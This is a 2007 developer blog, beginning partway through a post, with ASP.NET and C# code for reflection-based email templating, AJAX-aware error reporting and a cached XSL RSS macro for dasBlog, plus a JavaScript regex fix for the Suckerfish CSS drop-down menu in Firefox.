    protected void btnSubmit_Click(object sender, EventArgs e)
    {
        if (Page.IsValid && !String.IsNullOrEmpty(txtEmailBody.Text))
        {
            litOutput.Text = "<h2>Output</h2>";

            #region Perform some basic tests
            litOutput.Text += "<h3>Perform some basic tests:</h3>";
            TestObject testObject = new TestObject(1, "Tim", "tim@email.com", DateTime.Today);

            object obj = null;
            if (testObject.GetPropertyValueByName("id", false, ref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("name", true, ref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("joineddate", true, ref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("nothere", true, ref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            #endregion

            #region Create a collection and add a couple of items

            List<TestObject> testObjects = new List<TestObject>();
            testObjects.Add(new TestObject(1, "Tim", "tim@email.com", DateTime.Parse("01/02/2007")));
            testObjects.Add(new TestObject(2, "Jim", "jim@email.com", DateTime.Parse("20/02/2007")));
            testObjects.Add(new TestObject(3, "John", "john@email.com", DateTime.Parse("02/03/2007")));
            testObjects.Add(new TestObject(4, "Gill", "gill@email.com", DateTime.Parse("01/04/2007")));
            testObjects.Add(new TestObject(5, "Bill", "bill@email.com", DateTime.Parse("11/02/2007")));

            #endregion

            #region Do the work

            //Format it with <pre> for simplicity
            litOutput.Text += "<h3>Now for the reflection example:</h3><hr /><pre>";

            //Loop through the rows
            foreach (TestObject t in testObjects)
            {
                MatchEvaluator replaceField = delegate(Match m)
                {
                    //Get the property name (depending on your regex, but
                    //mine groups the curly brackets in there in case
                    //a match can't be found)
                    string pName = m.Groups[2].ToString();

                    //Check it's not null
                    if (!String.IsNullOrEmpty(pName))
                    {
                        //Create an object that'll be returned from the method
                        object o = null;
                        //Check if that property exists, if it does return it
                        if (t.GetPropertyValueByName(pName, chkCaseSensitive.Checked, ref o))
                            return o.ToString();
                    }
                    //We've not found a match for the property in the object
                    //so return the match instead as it's probably a mistake
                    return m.Value;
                };

                //Create a new body as this'll be updated for each user
                string body = String.Empty;

                //Find the fields within the main body -this can be any of the properties of the object
                Regex r = new Regex(@"({{)(\w{0,15}?)(}})");
                body = r.Replace(txtEmailBody.Text, replaceField);
                //Output the example content (HtmlEncoded so not to hurt us!!)
                litOutput.Text += String.Format("{0}<hr />", Server.HtmlEncode(body));
            }

            litOutput.Text += "</pre>";

            #endregion
        }
    }
}

I've thrown up a quick demo if you want to test it out. I think in the longer run I'm going to look into having it generate some form of reporting system, as that'd be seriously nice, but the sun's out and I need to go for a paddle so that'll have to wait for another day! So that's my first delve into reflection, and so far I love it!

Friday, March 09, 2007 5:12:02 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 

I've been using Phil Whinstanley's error reporting class1 within my applications for some time now and it really does help with diagnosing issues with sites during development (or client testing), as well as alerting me to errors on live sites. I also like it because it can highlight hacking attempts and spambot form submissions, allowing you to alter the site as needed. A lot of the time it also means we're alerted to an issue with the site before the client has a chance to call.

1 Note: I've been told the files Phil put online all those years ago are now offline, but don't panic, I'm posting the relevant files in another post shortly. If you don't want to use the search function (top right), or you're just keen, check out my comment within my post about ASP.Net WebException and Error Reporting useful code.

I’m glad he developed it because before this was around I was using a very simple email alert system that didn’t contain even a third of what this one does. Historically in ASP we always reported 500-100 errors as I don’t like clients spotting issues before I do. It’s very important to include error reporting in your code, otherwise you may miss a sequence of events that causes your client to lose out on a sale.

Recently however we got in on the Atlas/AJAX scene pretty early on because we had a new application that would really benefit from a lack of postback and as it was an internal application only where we had complete control over the user’s environment, accessibility wasn’t so much of a concern (though FWIW you can still use the site in the same way without JavaScript activated).

At present, our development server’s SMTP server isn’t working properly, so I didn’t think anything of receiving no email when I threw an exception during the early stages of development. As soon as I put the application onto the live server, however, I quickly noticed that I wasn’t receiving errors from it (we’ve got a test page to ensure the error reporting is working as expected). On investigation I found that the errors were being caught by the Atlas/AJAX handler (in a similar way to a try/catch block), which meant no emails were being sent out. So what do you do?

Note: Since I first started this article, Atlas has been released by Microsoft and is now AJAX, and as part of the current release it allows you to capture errors that are otherwise trapped by the framework and handle them as you like, but for completeness I’ll give an overview of the things I tried.

Firstly I tried simply bubbling the error up to the global.asax’s Application_Error event handler as I normally would, but that won’t work as the error will still be trapped by the Atlas/AJAX framework. Furthermore, the error returned to the user isn’t very useful (it’s the text within the exception):

Example standard Atlas/AJAX error - a pretty useless error message as far as the user is concerned!

The next thing I tried was taking the exception and passing it to the WebException as you would within the Application_Error event handler. Although this worked, and for this project would have been an acceptable solution because the ScriptManager was contained within a single MasterPage, I wanted a solution that I could easily roll out to other projects.

What I decided to do in the end was to wrap the WebException class, adding a single static method that takes an exception. I then replaced the code within the Global.asax and within the ScriptManager’s error event handler and responded to the user with a more informative message. The code below will output a user-friendly message (still in a popup, though you could redirect if desired). In the live application the user's location and a reference for the incoming error email are also shown to the user.

Note: TSDGlobals is a settings class we use here, it just references the relevant setting and contains a set of useful methods that we use throughout most of our projects.

aspx code

<asp:ScriptManager runat="server" ID="sm" EnablePartialRendering="true" AllowCustomErrorsRedirect="true" OnAsyncPostBackError="atlasScriptManager_PageError"></asp:ScriptManager>

codebehind

protected void atlasScriptManager_PageError(object sender, AsyncPostBackErrorEventArgs e)
{
    //A page reference for you (optional but useful)
    string __PageRef = "132";
    //Update the message the user will see
    sm.AsyncPostBackErrorMessage = String.Format("I'm sorry, an error has occurred, please contact us on 01234 567890. Quoting Page Ref: {0} - {1}", __PageRef, DateTime.Now.ToString());
    //Pass it through to the new Error Handler
    ErrorHandling.ErrorHandler.Handle(e.Exception);
}

global.asax

void Application_Error(object sender, EventArgs e)
{
    ErrorHandling.ErrorHandler.Handle(Server.GetLastError());
}

protected void Application_PreRequestHandlerExecute(Object sender, EventArgs e)
{
    if (Context.Handler is IRequiresSessionState || Context.Handler is IReadOnlySessionState)
        ErrorReporting.SessionTracker.AddRequest("Pre Request Handler Execute", true, true, false);
}

ErrorHandler.cs

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

namespace ErrorHandling
{
    public class ErrorHandler
    {
        //Declare for the scope of the class
        //Fetch the current request each time rather than caching it in a
        //static field (a static HttpRequest would be captured once and
        //shared across all subsequent requests)
        private static HttpRequest context
        {
            get { return HttpContext.Current.Request; }
        }

        public static void Handle(Exception currentError)
        {
            Handle(currentError, true);
        }

        public static void Handle(Exception currentError, bool redirectUser)
        {
            if (TSDGlobals.SendSiteErrors)
            {
                #region Deal with 404's

                //Redirect the user to a friendly page
                if (CheckForErrorType(currentError, "FileNotFound") && redirectUser)
                    RedirectToFriendlyUrl(TSDGlobals.ErrorPage_PageNotFound);

                #endregion
                #region Deal with Spambots

                //Check the error type
                if (CheckForErrorType(currentError, "System.FormatException"))
                {
                    if (context.Form.Count > 0)
                    {
                        foreach (string key in context.Form)
                        {
                            if (key.IndexOf("_VIEWSTATE") > 0 && context.Form[key].ToString().IndexOf("Content-Type") > 0)
                                return;
                        }
                    }
                }

                #endregion

                //Enable the trace for the duration of the error handling
                TraceContext t = HttpContext.Current.Trace;
                bool bCurrentState = t.IsEnabled;
                t.IsEnabled = true;

                #region Handle the Exception

                WebException WE = new WebException();
                WE.CurrentException = currentError;
                WE.Site = context.Url.Host.ToString();
                //Pull the information from the web.config here if desired
                WE.FloodCount = 50;
                WE.FloodMins = 5;

                #endregion
                #region Choose what you're interested in

                WE.ReturnCache = true;
                WE.DrillDownInCache = true;
                WE.IncludeApplication = true;
                WE.IncludeBrowser = true;
                WE.IncludeEnvironmentVariables = true;
                WE.IncludeForm = true;
                WE.IncludeProcess = true;
                WE.IncludeQueryString = true;
                WE.IncludeRequestCookies = true;
                WE.IncludeRequestHeader = true;
                WE.IncludeResponseCookies = true;
                WE.IncludeServerVariables = true;
                WE.IncludeSession = true;
                WE.IncludeTrace = true;
                WE.IncludeVersions = true;
                WE.IncludeAuthentication = true;

                #endregion

                WE.Handle();

                //Return the trace to its original state
                t.IsEnabled = bCurrentState;

                //Redirect the user to a friendly page
                if (redirectUser)
                    RedirectToFriendlyUrl(TSDGlobals.ErrorPage_CodeIssue);
            }
        }

        private static bool CheckForErrorType(Exception ex, string errorText)
        {
            if (ex != null)
            {
                //Check the exception
                //IndexOf can match at position 0 (e.g. "System.FormatException")
                if (ex.GetType().ToString().IndexOf(errorText) >= 0)
                    return true;
                else
                    return CheckForErrorType(ex.InnerException, errorText);
            }
            else
            {
                return false;
            }
        }

        private static void RedirectToFriendlyUrl(string Url)
        {
            //Only redirect the user if the URL is not empty and we're not on a dev machine
            //TODO: Check the referrer to ensure we don't redirect the user to the page causing the error!
            //TODO: Pull the list of development server addresses from an XML file
            if (!String.IsNullOrEmpty(Url) && (context.Url.Host.IndexOf("localhost") < 0))
                HttpContext.Current.Response.Redirect(Url);
        }
    }
}

I’m not sure if this is a recommended way of doing it but it works pretty well, and in my case the majority of settings in the code are the same regardless of the project, though you can still alter those if required. As they’re not likely to change from project to project I’ve kept the settings within the web.config. I decided to wrap Phil’s code in my own because that way if he ever releases an update (not sure what that’d do tbh) I could just drop the new WebException code into my project and be ready to go straight away.

What do you think Phil? Use or Abuse of your code ;)

Friday, March 09, 2007 7:57:18 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, February 24, 2007

As part of my blog’s re-design I wanted to integrate my statistics from Last.FM, which monitors what music you’re listening to and generates a stack of statistics about your listening habits (see About Last FM for more information).

Anyways, I started writing my own RSS macro when I came across one already developed by John Forsythe (http://www.jforsythe.com/) which did pretty much exactly what I was planning on developing. The only difference was that his was hard-coded to preset node names, whereas I was planning on using an XSL file to format mine to offer maximum flexibility in the long run, so I updated his with the use of Reflector (thanks to John Forsythe though!!).

There are a couple of differences to note between this code and John Forsythe's:

  • The RSS retrieval is no longer handled by an external library -in this instance I wanted to keep this as simple and stand-alone as possible.
  • There is no max item count at present -this is mainly because I didn't need it for the Last.FM Feed, I may alter that later.

Source code for a dasBlog XSL based RSS reader

using System;
using System.IO;
using System.Security.Cryptography;
using System.Diagnostics;
using System.Text;
using System.Web;
using System.Web.UI;

using newtelligence.DasBlog.Runtime;
using newtelligence.DasBlog.Web.Core;

namespace TSDMacros
{
    public class TheSiteDoctor
    {
        protected SharedBasePage requestPage;
        protected Entry currentEntry;

        public TheSiteDoctor(SharedBasePage page, Entry entry)
        {
            requestPage = page;
            currentEntry = entry;
        }

        /// <summary>
        /// A dasBlog macro to retrieve an RSS feed and apply XSL to 
        /// it before caching it for x minutes
        /// </summary>
        /// <param name="xslVPath">The virtual path of the XSL file</param>
        /// <param name="rssPath">The RSS feed URL</param>
        /// <param name="minutesToCache">Number of minutes to cache the file for</param>
        /// <param name="debugMode">Output the debug information</param>
        /// <returns>A control that can be inserted into a dasBlog template</returns>
        public virtual Control GetRSS(string xslVPath, string rssPath, int minutesToCache, bool debugMode)
        {
            string cacheVDir = "./content/getrsscache/";
            string cachedFileLoc = String.Empty;
            StringBuilder output = new StringBuilder();

            bool writeToCache = false;
            bool cacheExpired = false;
            bool cacheExists = false;

            #region Debug output
            if (debugMode)
            {
                output.Append("<strong>&lt;start debug&gt;</strong><hr />\r\n");
                output.AppendFormat("<i>RssPath</i>: {0}<br />\r\n", rssPath);
                output.AppendFormat("<i>minutesToCache</i>: {0}<br />\r\n", minutesToCache);
                output.AppendFormat("<i>CacheStorageFolder</i>: {0}<br />\r\n", cacheVDir);
                output.Append("<hr />\r\n");
            }
            #endregion

            #region Check whether we need to cache or not
            if (minutesToCache > 0)
            {
                writeToCache = true;
                //Find the cache directory
                string cacheDir = HttpContext.Current.Server.MapPath(cacheVDir);
                //Work out what the file would be called based on the RSS URL
                cachedFileLoc = Path.Combine(cacheDir, HttpUtility.UrlEncode(TheSiteDoctor.GetMd5Sum(rssPath)) + ".cache");
                #region Debug output
                if (debugMode)
                {
                    output.AppendFormat("<i>cache file</i>: {0}\r\n", cachedFileLoc);
                }
                #endregion
                if (!File.Exists(cachedFileLoc))
                {
                    cacheExpired = true;
                    #region Debug output
                    if (debugMode)
                    {
                        output.Append("<i>cache age</i>: no file exists<br />");
                    }
                    #endregion
                }
                else
                {
                    FileInfo info1 = new FileInfo(cachedFileLoc);
                    TimeSpan span1 = (TimeSpan)(DateTime.Now - info1.LastWriteTime);
                    if (span1.TotalMinutes > minutesToCache)
                    {
                        cacheExists = true;
                        cacheExpired = true;
                    }
                    #region Debug output
                    if (debugMode)
                    {
                        output.AppendFormat("<i>cache age</i>: {0} min old<br />\r\n", span1.TotalMinutes);
                    }
                    #endregion
                }
            }
            else
            {
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>caching disabled - CacheStorageAgeLimit=0</strong><br /><span style=\"color:red; font-weight: bold;\">FYI: All requests to this page will cause a new server request to the RssPath</span><br />");
                }
                #endregion
                cacheExpired = true;
            }

            #endregion

            #region Debug output
            if (debugMode)
            {
                output.Append("<hr />");
            }
            #endregion
            //Check whether or not the cache has expired
            if (cacheExpired)
            {
                #region Debug output
                if (cacheExists && debugMode)
                {
                    output.Append("<strong>file cache is expired, getting a new copy right now</strong><br />");
                }
                else if (debugMode)
                {
                    output.Append("<strong>no cache, getting file</strong><br />");
                }
                #endregion
                //The cache has expired so retrieve a new copy
                output.Append(TheSiteDoctor.delegateRss(xslVPath, rssPath, 0, writeToCache, cachedFileLoc, debugMode));
            }
            else
            {
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>cool, we got the file from cache</strong><br />");
                }
                #endregion
                //The cache still exists and is valid
                StreamReader reader1 = File.OpenText(cachedFileLoc);
                output.Append(reader1.ReadToEnd());
                reader1.Close();
            }
            #region Debug output
            if (debugMode)
            {
                output.Append("<hr /><strong>&lt;end debug&gt;</strong>");
            }
            #endregion

            output.Append("\r\n<!-- \r\ndasBlog RSS feed produced using the macro from Tim Gaunt\r\nhttp://blogs.thesitedoctor.co.uk/tim/\r\n-->");

            return new LiteralControl(output.ToString());
        }

        /// <summary>
        /// RSS feed retrieval worker method. Retrieves the RSS feed 
        /// and applies the specified XSL document to it before caching 
        /// a copy to the disk -this should be called after it has been 
        /// established the cache is out of date.
        /// </summary>
        /// <param name="xslVPath">The virtual path of the XSL file</param>
        /// <param name="rssPath">The RSS feed URL</param>
        /// <param name="timeoutSeconds">Number of seconds before the request should timeout</param>
        /// <param name="writeCache">Whether to cache a copy on disk</param>
        /// <param name="xmlPath">Physical path of the XML file on the disk</param>
        /// <param name="debugMode">Output the debug information</param>
        /// <returns>An XML document as a string</returns>
        private static string delegateRss(string xslVPath, string rssPath, int timeoutSeconds, bool writeCache, string xmlPath, bool debugMode)
        {
            StringBuilder output = new StringBuilder();
            bool errorThrown = false;
            string cacheVDir = "./content/getrsscache/";
            string xslPath = HttpContext.Current.Server.MapPath(xslVPath);

            try
            {
                //TODO: Replace this with a HttpRequest and timeout to ensure the visitor is not left waiting for the file to load
                //Load the XML
                System.Xml.XmlDocument xmlDoc = new System.Xml.XmlDocument();
                xmlDoc.Load(rssPath);

                //Load the XSL
                System.Xml.Xsl.XslTransform xslDoc = new System.Xml.Xsl.XslTransform();
                xslDoc.Load(xslPath);
                
                StringBuilder sb = new StringBuilder();
                StringWriter sw = new StringWriter(sb);

                //Apply the XSL to the XML document
                xslDoc.Transform(xmlDoc, null, sw);

                //Append the resulting code to the output file
                output.Append(sb.ToString());
            }
            catch (Exception ex)
            {
                errorThrown = true;
                #region Debug output
                if (debugMode)
                {
                    //Log the exception to the dasBlog exception handler
                    ErrorTrace.Trace(TraceLevel.Error, ex);
                    output.AppendFormat("<ul style=\"\"><li><strong>RSS request failed :(</strong> <br />{0}</li></ul>", ex.ToString());
                }
                #endregion
            }

            //Save a cache of the returned RSS feed if no errors occured
            if (writeCache && !errorThrown)
            {
                //Find the cache's storage directory
                DirectoryInfo dir = new DirectoryInfo(HttpContext.Current.Server.MapPath(cacheVDir));
                //Check it exists
                if (!dir.Exists)
                {
                    dir.Create();
                    #region Debug output
                    if (debugMode)
                    {
                        output.AppendFormat("<strong>just created the directory:</strong> {0}<br />", HttpContext.Current.Server.MapPath(cacheVDir));
                    }
                    #endregion
                }
                //Create the file
                StreamWriter writer1 = File.CreateText(xmlPath);
                writer1.Write(output);
                writer1.Flush();
                writer1.Close();
                #region Debug output
                if (debugMode)
                {
                    output.Append("<strong>just wrote the new cache file</strong><br />");
                }
                #endregion
            }

            return output.ToString();
        }

        /// <summary>
        /// Worker method to identify the MD5 checksum of a string
        /// in this instance used to ensure the RSS file isn't already
        /// cached (based on the URL supplied)
        /// </summary>
        /// <param name="str"></param>
        /// <returns></returns>
        public static string GetMd5Sum(string str)
        {
            Encoder encoder1 = Encoding.Unicode.GetEncoder();
            byte[] buffer1 = new byte[str.Length * 2];
            encoder1.GetBytes(str.ToCharArray(), 0, str.Length, buffer1, 0, true);
            byte[] buffer2 = new MD5CryptoServiceProvider().ComputeHash(buffer1);
            StringBuilder builder1 = new StringBuilder();
            for (int i = 0; i < buffer2.Length; i++)
            {
                builder1.Append(buffer2[i].ToString("X2"));
            }
            return builder1.ToString();
        }

    }
}

XSL that I use for Last.FM

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="html" /> 
  <xsl:template match="/">
    <h2>Recent Tracks</h2>
    <ul>
    <xsl:for-each select="recenttracks/track">
        <li>
            <a href="{url}">
                <xsl:value-of select="artist" /> - <em><xsl:value-of disable-output-escaping="yes" select="name" /></em>
            </a>
        </li>
    </xsl:for-each>
    </ul>
    <p><a href="About-Last-FM.aspx" title="last.fm - The Social Music Revolution"><img alt="last.fm - The Social Music Revolution" src="images/lastfm_mini_black.gif" /></a></p>
  </xsl:template>
</xsl:stylesheet>

To use it on the blog template

<% GetRSS("LastFM.xsl", "http://ws.audioscrobbler.com/1.0/user/timgaunt/recenttracks.xml", 25, false)|tsd %>

This is a pretty crude way of doing it IMHO because the XSL transforms the stream directly. Eventually I’ll update the code so it includes a timeout (as John’s did) and, having seen the performance implications on my blog, make sure the request is made asynchronously.

FWIW I have set my cache value to 25 minutes. I did have it at 1 minute for fun but it killed the blog. Why have I set it to 25 minutes? Well, most of my tracks are 2-3 minutes long, and as I list 10 tracks at a time that’s 20-30 minutes of listening time, so it’ll still keep a fairly accurate overview of my tracks without causing massive performance issues on my blog :)

In case you don't want to, or don't know how to, create this macro as a DLL I have created it for you :)

Download the complete dasBlog RSS feed macro (/tim/files/TSDMacros_v1_23-02-07.zip, 4KB - MD5 Hash: e3d7d6320109fd07259e8d246b754f13)

Saturday, February 24, 2007 2:39:04 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Friday, February 23, 2007

We’re currently reworking www.florame.co.uk to improve its search engine ranking from virtually non-existent to (hopefully) first page for various inflections of organic aromatherapy, organic essential oils and all sorts of other aromatherapy products.

Despite the ongoing debate over whether search engine crawlers prefer pretty XHTML or not, I still believe strongly that having your site’s content as the dominant code on every page MUST be better than having a plethora of tags (aka tag soup), but that’s for another post. With my feelings on XHTML (or at least neat HTML) in mind, one of our recommendations was to rework the site’s code, most importantly removing the JavaScript menu at the top which is seriously impeding the site’s ranking. I decided we should opt for a form of CSS menu and, as those in the know know, there are only a few available options; for reference we used the Suckerfish drop down menu.

The Suckerfish CSS drop down menu has been fairly heavily tested, but I think I’ve found an issue with Firefox. Basically, the JavaScript marks up the LI with a hover class (sfhover) which then ensures the menu works as expected (this isn’t needed in IE7 or FF btw). The catch I’ve found, however, is that in FF1.5 (I’ll test in 2.0) with scripts enabled, the menus stay shown.

After a little head scratching the issue was narrowed down to this line of JavaScript:

this.className = this.className.replace(new RegExp(" sfhover\\b"), "");

Thanks to Firebug I was able to step through the code and check the properties at every stage. In this instance I found that Firefox trims the leading and trailing space from the className, so instead of it reading class=" sfhover" (with the leading space) as it is written, it had class="sfhover", which may be correct in some ways but obviously cocked up the regex.

The solution is really rather simple, just change the space so it’s optional:

this.className = this.className.replace(new RegExp("\\s?sfhover\\b"), "");
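To see the difference in isolation, here's a small stand-alone sketch (plain JavaScript, class names as in the post) of what happens once Firefox has trimmed the leading space:

```javascript
// Firefox stores the trimmed className, so the original pattern
// (which requires a leading space) never matches and the class
// is never removed:
var trimmed = "sfhover";
var broken = trimmed.replace(new RegExp(" sfhover\\b"), "");
// broken is still "sfhover"

// Making the space optional handles both the trimmed and
// untrimmed forms of the attribute:
var fixedTrimmed = trimmed.replace(new RegExp("\\s?sfhover\\b"), "");
var fixedUntrimmed = "nav sfhover".replace(new RegExp("\\s?sfhover\\b"), "");
// fixedTrimmed is "", fixedUntrimmed is "nav"
```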

It’s not an ideal fix but in the case of Florame organic aromatherapy it sorted the issue :) I’m going to let Mozilla know about this, as in some ways I think it’s a glitch (though I can see their thinking that the developer didn’t mean to add the leading space), to see what they say. It wouldn't surprise me though if it was something I had done wrong!

For reference, the entire menu script now reads:

<script type="text/javascript"><!--//--><![CDATA[//><!--
sfHover = function() {
    var sfEls = document.getElementById("nav").getElementsByTagName("LI");
    for (var i=0; i<sfEls.length; i++) {
        sfEls[i].onmouseover=function() {
            this.className += " sfhover";
        }
        sfEls[i].onmouseout=function() {
            this.className = this.className.replace(new RegExp("\\s?sfhover\\b"), "");
        }
    }
}
if (window.attachEvent) window.attachEvent("onload", sfHover);
//--><!]]></script>

Update 7th May 2007: Darren over at Forma3 has come up with a new and improved version of the SuckerFish menu which includes a number of nice improvements and is well worth checking out: CSS drop down menus with persistent top level menu styling

Friday, February 23, 2007 6:20:17 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [3]  |